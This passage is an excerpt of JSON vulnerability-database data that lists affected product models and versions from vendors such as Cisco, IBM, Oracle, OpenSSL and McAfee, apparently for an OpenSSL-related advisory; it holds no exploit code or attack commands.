{ "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "sparc enterprise m8000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1121" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.6.0.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.3" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.23" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3394" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.20" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.9" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "telepresence sx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.21" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.6" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0.1" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8200" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.12" }, { "model": "unified communications manager im \u0026 presence service (formerly c", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3" }, { "model": "sparc enterprise m3000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1121" }, { "model": "identifi wireless", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.24" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.22" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.20" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "9" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "10.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.12" }, { "model": "fujitsu m12-2 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3000" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "10.2" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.2" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "10" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.2" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.0.1.3" }, { "model": "anyconnect secure mobility client for mac os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0.7" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "partner support service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud web security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime collaboration assurance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "jabber for iphone and ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.8" }, { "model": "webex meetings client on-premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6(1)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0.12" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac appliance clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.0" }, { "model": "ucs b-series blade servers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.1.3" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.2" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.14" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "communications session border controller scz7.3.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "api gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "services provisioning platform sfp1.1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "video surveillance series high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "jabber for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.4" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0.2" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "12" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.9" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.1.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.1.4" }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3.8" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "fujitsu m12-2s server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2290" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.10" }, { "model": "sparc enterprise m4000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "stealthwatch identity", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.44" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.0" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2(1)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.30" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "jboss web server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.26" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.19" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0.4" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization quality management solution 11.5 su1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system ex series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "universal small cell iuh", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "11.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.24" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "13" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.16" }, { "model": "jabber client framework components", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex meetings client on-premises t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dcm series d9900 digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.4" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.19" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.6" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.3" }, { "model": "project openssl 1.0.2i", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.14" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.4" }, { "model": "bigfix remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "prime network services controller 1.01u", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.12" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.9.15.9.8" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.10" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1000v" }, { "model": "telepresence system tx1310", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "fujitsu m10-1 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2320" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.34" }, { "model": "telepresence server on multiparty media and", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3103204.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "project openssl 1.0.2h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "anyconnect secure mobility client for linux", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "fujitsu m10-4s server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2271" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "telepresence system ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.1.0" }, { "model": "webex business suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.5(3)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.1.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.19" }, { "model": "fujitsu m12-2 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2320" }, { "model": "nexus series blade switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.17" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.18" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.0.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-376.1" }, { "model": "jabber for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "telepresence profile series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.14" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1.0.0" }, { "model": "purview appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "ace30 application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "edge digital media player 1.6rb5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "telepresence isdn gateway mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.10" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.43" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.0.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.1.0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wireless lan controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0.6" }, { "model": "uc integration for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.18" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.5.0" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "telepresence system tx1310", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "telepresence mx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.16" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0(1)" }, { "model": "sparc enterprise m4000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1121" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.4" }, { "model": "sparc enterprise m9000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.26" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.14" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.179" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.35" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.11" }, { "model": "spa122 analog telephone adapter with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.23" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.1.1049" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.36" }, { "model": "openssh for gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.4" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.15" }, { "model": "bigfix remote control", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "fujitsu m10-4s server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2320" }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.22" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.30" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.9" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.19" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.10" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "macos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.12.1" }, { "model": "tandberg codian isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": 